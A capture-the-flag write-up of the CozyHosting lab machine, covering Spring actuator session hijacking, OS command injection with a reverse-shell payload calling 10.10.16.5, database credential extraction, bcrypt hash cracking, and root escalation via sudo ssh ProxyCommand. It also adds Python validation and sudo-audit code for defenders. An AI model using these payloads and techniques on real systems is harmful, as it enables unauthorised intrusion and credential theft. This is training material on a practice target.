
CozyHosting

Personal Rating: Medium

Last updated 1 year ago

Enumeration

Running an initial nmap scan:

sudo nmap -v -sC -sV <IP>

Nmap scan report for cozyhosting.htb (10.10.11.230)
Host is up (0.041s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 43:56:bc:a7:f2:ec:46:dd:c1:0f:83:30:4c:2c:aa:a8 (ECDSA)
|_ 256 6f:7a:6c:3f:a6:8d:e2:75:95:d4:7b:71:ac:4f:7e:42 (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-title: Cozy Hosting - Home
|_http-server-header: nginx/1.18.0 (Ubuntu)
  • There is a home redirection to index.html, which is then not found.

  • NiceAdmin Template, Updated: Mar 09 2023 with Bootstrap v5.2.3

  • Login page at http://cozyhosting.htb/login

  • The login does not seem to be injectable after several scans of the username and password parameters in the POST request.

  • /error and /admin (which redirects to /login) were found, but were not interesting at first glance.

  • This request returns an empty 200 page: GET http://cozyhosting.htb/<%=42*42%>

  • This request and many others redirect to a Whitelabel Error Page: GET http://cozyhosting.htb/{42*42}

After using feroxbuster with a different wordlist we find /actuator, which grants access to an API!

 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓                 ver: 2.10.0
───────────────────────────┬──────────────────────
 🎯  Target Url            │ http://cozyhosting.htb
 🚀  Threads               │ 128
 📖  Wordlist              │ /usr/share/seclists/Discovery/Web-Content/spring-boot.txt
 💢  Status Code Filters   │ [400]
 💥  Timeout (secs)        │ 7
 🦡  User-Agent            │ feroxbuster/2.10.0
 🤯  Header                │ Cookie:  JSESSIONID=28BDB453CA6F81483FB4D4F41B5C6316
 🔎  Extract Links         │ true
 🏁  HTTP methods          │ [GET]
 🔃  Recursion Depth       │ 4
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404      GET        1l        2w        -c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
404      GET        0l        0w        0c http://cozyhosting.htb/actuator/env/spring.jmx.enabled
404      GET        0l        0w        0c http://cozyhosting.htb/actuator/env/tz
200      GET        1l        1w       48c http://cozyhosting.htb/actuator/sessions
<SNIP>

Springboot API Enumeration

At /actuator/sessions there is this interesting entry, a live session ID for the user kanderson:

0DF960B8E984BFE1591E481ED1DA02B0 "kanderson"

I could replace my own JSESSIONID cookie with this value in the browser developer tools (F12) and access /admin:

At POST /executessh with the data host=cozyhosting&username=test%0Als I get this error (the application redirects to http://cozyhosting.htb/admin?error=ssh: carrying the message):

Could not resolve hostname test: Temporary failure in name resolution/bin/bash: line 2: ls@cozyhosting: command not found

This could be a way in.

OS Command Injection

So a command injection should be possible here. After some testing, this payload worked to read PATH:

host=cozyhosting&username=${PATH};

I then continued to test different payloads until I created a working reverse shell payload.

zz;%0A/bin/bash%09-c%09$(id)
-->    id=1001(app) gid=1001(app) uid=1001(app)
host=cozyhosting&username=s||wget%0910.10.16.5:8000/$(bash%09-i%09>%26%09/dev/tcp/10.10.16.5/1337%090>%261);

I caught the reverse shell with Metasploit and upgraded it to a Meterpreter session to make things easier.
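As an added example (not the box's source code), here is the weak string-building pattern behind this bug beside a hardened request handler, checked against the exact username payloads used above; the username/host policy and the ConnectTimeout option are assumptions.

```python
"""Hardened input handling for an 'execute ssh' style endpoint, beside the weak
string-building pattern the CozyHosting writeup abuses. Added example; this is
not the box's real source code, and the validation policy is an assumption."""
import re
from urllib.parse import unquote

# Assumed policy: POSIX portable usernames, 1-32 chars. fullmatch + \Z matters:
# a plain '$' anchor accepts a trailing newline, which is exactly what %0A smuggles in.
USERNAME_RE = re.compile(r"[a-z_][a-z0-9_-]{0,31}\Z")
HOSTNAME_RE = re.compile(r"[A-Za-z0-9][A-Za-z0-9.-]{0,253}\Z")


def vulnerable_command(host, username):
    """Weak pattern: decode the form values and splice them into one shell string.
    With username 'test%0Als' the shell sees two lines, 'ssh ... test' and
    'ls@cozyhosting', which is exactly the error the writeup observed."""
    return f"ssh -o ConnectTimeout=1 {unquote(username)}@{unquote(host)}"


def hardened_argv(host, username):
    """Validate the decoded values, then build an argument vector for subprocess.run
    (no shell parses it); '--' stops ssh reading a leading '-' as an option."""
    username, host = unquote(username), unquote(host)
    if not USERNAME_RE.fullmatch(username):
        raise ValueError(f"rejected username: {username!r}")
    if not HOSTNAME_RE.fullmatch(host):
        raise ValueError(f"rejected host: {host!r}")
    return ["ssh", "-o", "ConnectTimeout=1", "--", f"{username}@{host}"]


# Constructed inputs: the raw username values from the writeup above.
WRITEUP_PAYLOADS = [
    "test%0Als",
    "${PATH};",
    "zz;%0A/bin/bash%09-c%09$(id)",
    "s||wget%0910.10.16.5:8000/$(bash%09-i%09>%26%09/dev/tcp/10.10.16.5/1337%090>%261);",
]


def audit(usernames, host="cozyhosting"):
    """Map each candidate username to True (accepted) or False (rejected by validation)."""
    verdicts = {}
    for name in usernames:
        try:
            hardened_argv(host, name)
            verdicts[name] = True
        except ValueError:
            verdicts[name] = False
    return verdicts
```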

Internal Enum & Persistence

ss -tlpn revealed an interesting open port: 5432, which belongs to PostgreSQL.

I created ssh keys for persistence:

ssh-keygen  
Generating public/private rsa key pair.
Enter file in which to save the key (/home/app/.ssh/id_rsa): /tmp/appuser-rsa           
Enter passphrase (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved in /tmp/appuser-rsa
Your public key has been saved in /tmp/appuser-rsa.pub

This did not work, as the app user cannot log in over SSH with public-key authentication.

According to /etc/passwd there is the user postgres (and the user josh).

I found the PostgreSQL password in cloudhosting-0.0.1/BOOT-INF/classes/htb/application.properties after extracting the archive I found at /app on the server:

spring.datasource.username=postgres
spring.datasource.password=Vg&nvzAQ7XxR

Database Access

I set up dynamic port forwarding with Metasploit and logged into the database remotely:

   name    |                           password                           | role  
-----------+--------------------------------------------------------------+-------
 kanderson | $2a$10$E/Vcd9ecflmPudWeLSEIv.cvK6QjxjWlWXpij1NVNV3Mm6eH58zim | User
 admin     | $2a$10$SpKYdHLB0FOaT7n3x72wtuS0yR8uqqbNNpIPjUb2MZib3H9kVO8dm | Admin

Using ./john /HTBfolder/Boxes/HTB-CozyHosting/hashes.txt --wordlist=/usr/share/seclists/Passwords/rockyou.txt I get:

manchesterunited (?)

Using hashcat I get the same result:

hashcat -m 3200 '$2a$10$SpKYdHLB0FOaT7n3x72wtuS0yR8uqqbNNpIPjUb2MZib3H9kVO8dm' /usr/share/seclists/Passwords/rockyou.txt --show

$2a$10$SpKYdHLB0FOaT7n3x72wtuS0yR8uqqbNNpIPjUb2MZib3H9kVO8dm:manchesterunited

Using this password I could log on to the server as josh over SSH.

GTFOBin ssh

The user josh can execute ssh as root via sudo:

josh@cozyhosting:~$ sudo -l
[sudo] password for josh: 
Matching Defaults entries for josh on localhost:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User josh may run the following commands on localhost:
    (root) /usr/bin/ssh *

This is a GTFOBin. Using the GTFOBins entry for ssh I found exploitation methods for it:

sudo /usr/bin/ssh -o ProxyCommand=';sh 0<&2 1>&2' x
# whoami
root
# cat /root/root.txt
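As an added defender-side example (not from the writeup), a small auditor that parses the sudo -l output above and flags the ssh rule; the set of shell-escaping binaries is an assumed subset of GTFOBins.

```python
"""Audit 'sudo -l' output for rules that hand a user a root shell, such as the
'(root) /usr/bin/ssh *' rule found above. Added example, not part of the writeup."""
import re

# Constructed sample: the sudo -l output from the writeup.
SUDO_L_OUTPUT = r"""Matching Defaults entries for josh on localhost:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User josh may run the following commands on localhost:
    (root) /usr/bin/ssh *
"""

# Binaries whose own options or subcommands spawn a shell (assumed small subset of GTFOBins).
SHELL_ESCAPE_BINARIES = {"ssh", "vim", "vi", "less", "more", "find", "awk", "env", "perl", "python3"}

# One privilege line: '(runas[:group]) [TAG:] /path/cmd [args]'
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>\S+)\s*(?P<args>.*)$")


def parse_sudo_rules(text):
    """Return the privilege lines that follow the 'may run the following commands' header."""
    rules, in_rules = [], False
    for line in text.splitlines():
        if re.match(r"^User \S+ may run the following commands", line):
            in_rules = True
            continue
        m = RULE_RE.match(line) if in_rules else None
        if m:
            rules.append({"runas": m["runas"].strip(), "tags": m["tags"].replace(" ", ""),
                          "cmd": m["cmd"], "args": m["args"].strip()})
    return rules


def risky_rules(text):
    """Flag root/ALL rules with unconstrained arguments, a shell-escaping binary, or NOPASSWD.
    In sudoers an absent argument list means any arguments, so it is treated like '*'."""
    findings = []
    for r in parse_sudo_rules(text):
        if r["runas"].split(":")[0].strip() not in ("root", "ALL"):
            continue
        reasons = []
        if r["args"] == "" or "*" in r["args"]:
            reasons.append("unconstrained arguments")
        if r["cmd"].rsplit("/", 1)[-1] in SHELL_ESCAPE_BINARIES:
            reasons.append("binary can spawn a shell (see GTFOBins)")
        if "NOPASSWD" in r["tags"]:
            reasons.append("no password required")
        if reasons:
            findings.append((f"({r['runas']}) {r['cmd']} {r['args']}".strip(), reasons))
    return findings
```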

References

  • HackTricks, Spring actuators: https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/spring-actuators
  • ssh | GTFOBins: https://gtfobins.github.io/gtfobins/ssh/